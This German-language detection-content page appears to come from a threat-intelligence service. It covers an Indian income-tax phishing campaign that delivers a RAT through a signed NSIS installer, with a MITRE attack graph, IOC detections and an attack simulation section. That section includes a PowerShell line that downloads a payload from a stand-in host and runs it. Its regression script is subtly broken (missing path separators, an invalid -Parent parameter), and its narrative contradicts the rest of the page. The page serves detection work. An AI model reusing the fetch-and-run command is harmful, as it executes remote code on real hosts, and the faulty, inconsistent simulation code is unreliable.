Folgen
Detection stack
- AIDR
- Alert
- ETL
- Query
Zusammenfassung
Eine Phishing-Operation, die das indische Finanzamt imitiert, liefert ein präpariertes PDF, das Empfänger zu einem gefälschten Compliance-Portal führt. Die Seite fordert die Opfer auf, ein ZIP-Paket herunterzuladen, das einen signierten NSIS-Installer enthält, welcher dann eine mehrstufige Remote Access Trojan (RAT) ausführt. Der RAT bleibt bestehen, indem er einen Windows-Dienst erstellt und mit mehreren C2-Servern über nicht-standardisierte Ports kommuniziert.
Untersuchung
Forscher analysierten den PDF-Köder, die eingebettete URL und den verketteten NSIS-Installer-Workflow. Sie dokumentierten die auf die Festplatte übertragenen Binärdateien, die Erstellung eines versteckten Installationsordners und die Registrierung von NSecRTS.exe als Windows-Dienst. Der Bericht erfasste auch ausgehende Kommunikation zu drei IP-Adressen und hob die Verwendung signierter Payloads während der gesamten Lieferkette hervor.
Abhilfe
Blockieren Sie die bösartige Domain und die zugehörigen IP-Adressen am Perimeter und durch Proxy-Kontrollen. Stärken Sie den E-Mail-Schutz, um steuerbezogene Anhänge und Links zu Compliance-Portalen im Lookalike-Design zu kennzeichnen. Verhindern Sie die automatische Ausführung nicht vertrauenswürdiger Installer, wo möglich, und überwachen Sie die Erstellung verdächtiger Dienste – insbesondere alles, das den Namen „Windows Real-time Protection Service“
trägt.
Alarmieren Sie bei den aufgeführten Dateinamen, Hashes und Aktivitäten zur Windows-Dienstregistrierung, die mit der Infektionskette verbunden sind. Isolieren Sie betroffene Endpunkte, erfassen Sie Arbeitsspeicher- und Festplattenabbilder und führen Sie eine vollständige forensische Untersuchung durch, um weitere RAT-Stufen oder Tools zu identifizieren. Entfernen Sie Persistenzartefakte und setzen Sie potenziell exponierte Anmeldeinformationen zurück, um erneuten Zugriff zu verhindern.
graph TB %% Klassendefinitionen classDef action fill:#99ccff classDef tool fill:#cccccc classDef malware fill:#ffcc99 classDef file fill:#e6e6e6 %% Knoten – Aktionen (MITRE-Techniken) action_phishing_attachment[„<b>Aktion</b> – T1566.001: <b>Spearphishing-Anhang</b><br/>E-Mail mit bösartigem PDF „Review Annexure.pdf“ wird an das Opfer zugestellt.“] class action_phishing_attachment action action_phishing_link[„<b>Aktion</b> – T1566.002: <b>Spearphishing-Link</b><br/>Das PDF enthält einen Link zu einem gefälschten Einkommensteuer-Portal (hxxps://www.akjys.top/).“] class action_phishing_link action action_user_execution[„<b>Aktion</b> – T1204.002: <b>Benutzerausführung</b><br/>Das Opfer klickt auf den Link, die ZIP-Datei wird automatisch heruntergeladen und der Installer ausgeführt.“] class action_user_execution action action_code_signing[„<b>Aktion</b> – T1553.002: <b>Code-Signierung</b><br/>NSIS-Installer sind mit legitim wirkenden Zertifikaten signiert.“] class action_code_signing action action_signed_binary_proxy[„<b>Aktion</b> – T1218: <b>Ausführung über signierten Binärproxy</b><br/>Der signierte NSIS-Installer startet die bösartige Nutzlast und umgeht Sicherheitskontrollen.“] class action_signed_binary_proxy action action_obfuscation[„<b>Aktion</b> – T1027.002: <b>Software-Packing</b><br/>Mehrstufige NSIS-Wrapper verschlüsseln und verbergen bösartige Binärdateien.“] class action_obfuscation action action_persistence_service_perm[„<b>Aktion</b> – T1574.010: <b>Schwäche bei Dienstdateiberechtigungen</b><br/>Der Installer ändert die Berechtigungen von Dienstdateien.“] class action_persistence_service_perm action action_persistence_service[„<b>Aktion</b> – T1569.002: <b>Dienstausführung</b><br/>Registriert NSecRTS.exe als Windows-Dienst „Windows Real-time Protection Service“.“] class action_persistence_service action action_discovery_system[„<b>Aktion</b> – T1082: <b>Systeminformationsaufklärung</b><br/>Der RAT sammelt Betriebssystemversion und Hardwaredetails.“] class action_discovery_system action action_discovery_software[„<b>Aktion</b> – T1518: <b>Softwareaufklärung</b><br/>Der RAT ermittelt installierte Anwendungen und Dienste und speichert die Daten unter C:\Program Files\Common Files\NSEC\Data.“] class action_discovery_software action action_c2_web[„<b>Aktion</b> – T1071.001: <b>Web-Protokolle</b><br/>C2-Kommunikation über HTTP/HTTPS.“] class action_c2_web action action_c2_nonstandard[„<b>Aktion</b> – T1571: <b>Nicht-Standard-Port</b><br/>Verwendet die Ports 48991, 48992 und 3898 für den C2-Verkehr.“] class action_c2_nonstandard action action_c2_bidirectional[„<b>Aktion</b> – T1102.002: <b>Bidirektionaler Webdienst</b><br/>Ermöglicht eine bidirektionale Kommunikation mit dem Server.“] class action_c2_bidirectional action action_remote_access[„<b>Aktion</b> – T1219: <b>Remote-Access-Tools</b><br/>Der Angreifer führt Befehle aus, exfiltriert Daten und hält die Kontrolle aufrecht.“] class action_remote_access action action_exfiltration_scheduled[„<b>Aktion</b> – T1029: <b>Geplanter Datentransfer</b><br/>Gesammelte Daten werden periodisch per POST an den C2-Server gesendet.“] class action_exfiltration_scheduled action action_defense_evasion[„<b>Aktion</b> – T1070.004: <b>Dateilöschung</b><br/>Der Loader entfernt abgelegte Dateien und temporäre Ordner nach der Ausführung.“] class action_defense_evasion action action_multi_stage[„<b>Aktion</b> – T1104: <b>Mehrstufige Kanäle</b><br/>Aufeinanderfolgende Installer liefern die finale RAT-Nutzlast.“] class action_multi_stage action %% Knoten – Tools / Dateien / Malware tool_nsis_installer[„<b>Tool</b> – <b>Name</b>: NSIS Installer<br/><b>Beschreibung</b>: Signierter Installer zum Initialisieren der Nutzlast.“] class tool_nsis_installer tool malware_rat[„<b>Malware</b> – <b>Name</b>: NSEC RAT<br/><b>Beschreibung</b>: Remote-Access-Trojaner mit vollständiger Systemkontrolle.“] class malware_rat malware file_pdf[„<b>Datei</b> – <b>Name</b>: Review Annexure.pdf<br/><b>Typ</b>: Bösartiger PDF-Anhang.“] class file_pdf file file_zip[„<b>Datei</b> – <b>Name</b>: Review Annexure.zip<br/><b>Typ</b>: Archiv mit NSIS-Installer.“] class file_zip file file_exe[„<b>Datei</b> – <b>Name</b>: NSecRTS.exe<br/><b>Typ</b>: Als Windows-Dienst registrierte ausführbare Datei.“] class file_exe file %% Verbindungen – Angriffsablauf action_phishing_attachment –>|enthält| file_pdf file_pdf –>|verlinkt zu| action_phishing_link action_phishing_link –>|führt zu| file_zip file_zip –>|ausgeführt durch| action_user_execution action_user_execution –>|verwendet| tool_nsis_installer tool_nsis_installer –>|signiert mit| action_code_signing action_code_signing –>|ermöglicht| action_signed_binary_proxy action_signed_binary_proxy –>|verschleiert durch| action_obfuscation action_obfuscation –>|erstellt| malware_rat malware_rat –>|installiert als| action_persistence_service_perm action_persistence_service_perm –>|ermöglicht| action_persistence_service action_persistence_service –>|führt aus| file_exe file_exe –>|sammelt über| action_discovery_system file_exe –>|sammelt über| action_discovery_software action_discovery_system –>|sendet Daten an| action_c2_web action_discovery_software –>|sendet Daten an| action_c2_web action_c2_web –>|verwendet Ports| action_c2_nonstandard action_c2_web –>|verwendet Kanal| action_c2_bidirectional action_c2_bidirectional –>|stellt bereit| action_remote_access action_remote_access –>|führt aus| action_exfiltration_scheduled action_exfiltration_scheduled –>|löst aus| action_defense_evasion action_defense_evasion –>|geht voraus| action_multi_stage %% Styling class tool_nsis_installer, file_pdf, file_zip, file_exe tool class malware_rat malware class action_* action
Angriffsfluss
Erkennungen
Verdächtige Command and Control durch ungewöhnliche Top-Level-Domain (TLD) DNS-Anfrage (via DNS)
Ansehen
IOCs (DestinationIP) zum Erkennen: Indian Income Tax-Themed Phishing Campaign Targets Local Businesses
Ansehen
IOCs (SourceIP) zum Erkennen: Indian Income Tax-Themed Phishing Campaign Targets Local Businesses
Ansehen
IOCs (HashMd5) zum Erkennen: Indian Income Tax-Themed Phishing Campaign Targets Local Businesses
Ansehen
Erkennung der Malware-Ausführung in Indian Income Tax-Themed Phishing Campaign [Windows-Prozesserstellung]
Ansehen
Erkennung der NSecRTS.exe C2 Kommunikation [Windows-Netzwerkverbindung]
Ansehen
Simulation der Ausführung
Voraussetzung: Der Telemetrie- und Basislinien-Vorflug-Check muss bestanden sein.
Begründung: Dieser Abschnitt beschreibt die genaue Ausführung der gegnerischen Technik (TTP), die die Erkennungsregel auslösen soll. Die Befehle und Erzählungen MÜSSEN die identifizierten TTPs direkt widerspiegeln und darauf abzielen, die genaue Telemetrie zu erzeugen, die von der Erkennungslogik erwartet wird.
-
Angriffserzählung & Befehle:
Ein Angreifer liefert eine Phishing-E-Mail mit dem Titel „Einkommenssteuerbescheid“. Der Anhang ist ein bösartiges Word-Dokument, das ablegtsetup_Ir5swQ3EpeuBpePEpew=.exeto%TEMP%. Das Opfer führt die Datei aus, die wiederumSibuia.exe(die tatsächliche Nutzlast) als Kindprozess erzeugt. Diese Eltern-Kind-Kette soll generische Prozess-Erstellungswarnungen umgehen, wird aber von der Sigma-Regel erfasst.Schritte, die auf dem kompromittierten Host durchgeführt wurden:
- Das erste Stufenbinärformat ablegen:
$stage1 = "$env:TEMPsetup_Ir5swQ3EpeuBpePEpew=.exe" Invoke-WebRequest -Uri "http://malicious.example.com/stage1" -OutFile $stage1 - Das erste Stufenbinärformat ausführen:
Start-Process -FilePath $stage1 -NoNewWindow - Das erste Stufenbinärformat erstellt intern das zweite Stufenbinärformat
Sibuia.exeim selben Verzeichnis und startet es: (Simuliert durch das unten stehende Testskript.)
- Das erste Stufenbinärformat ablegen:
-
Regressionstest-Skript:
Das Skript unten reproduziert die exakte Eltern-Kind-Beziehung, die zur Auslösung der Regel erforderlich ist.# ------------------------------------------------- # Simulation der indischen Einkommenssteuer-Phishing-Kette # ------------------------------------------------- # Pfade definieren $stage1 = "$env:TEMPsetup_Ir5swQ3EpeuBpePEpew=.exe" $stage2 = "$env:TEMPSibuia.exe" # Dummy-Binärdateien erstellen (Null-Byte - ausreichend für Sysmon-Protokollierung) Set-Content -Path $stage1 -Value 'REM stage1 placeholder' -Encoding ASCII Set-Content -Path $stage2 -Value 'REM stage2 placeholder' -Encoding ASCII # Sicherstellen, dass Dateien ausführbar sind (Windows benötigt kein chmod) Write-Host "[*] Stufe1 wird gestartet..." $proc1 = Start-Process -FilePath $stage1 -PassThru # Stufe1 einen Moment zum „Erzeugen“ von Stufe2 (simuliert durch direkten Start) geben Start-Sleep -Milliseconds 500 Write-Host "[*] Stufe1 erzeugt Stufe2 (Sibuia.exe)..." $proc2 = Start-Process -FilePath $stage2 -PassThru -Parent $proc1.Id Write-Host "[+] Simulation abgeschlossen. Überprüfen Sie die Erkennung im SIEM." # ------------------------------------------------- -
Bereinigungsbefehle:
Entfernen Sie die Artefakte und beenden Sie alle verbleibenden Prozesse.# Alle verbleibenden Prozesse stoppen Get-Process -Name "setup_Ir5swQ3EpeuBpePEpew=" -ErrorAction SilentlyContinue | Stop-Process -Force Get-Process -Name "Sibuia" -ErrorAction SilentlyContinue | Stop-Process -Force # Dateien löschen Remove-Item -Path "$env:TEMPsetup_Ir5swQ3EpeuBpePEpew=.exe" -Force -ErrorAction SilentlyContinue Remove-Item -Path "$env:TEMPSibuia.exe" -Force -ErrorAction SilentlyContinue Write-Host "[*] Bereinigung abgeschlossen."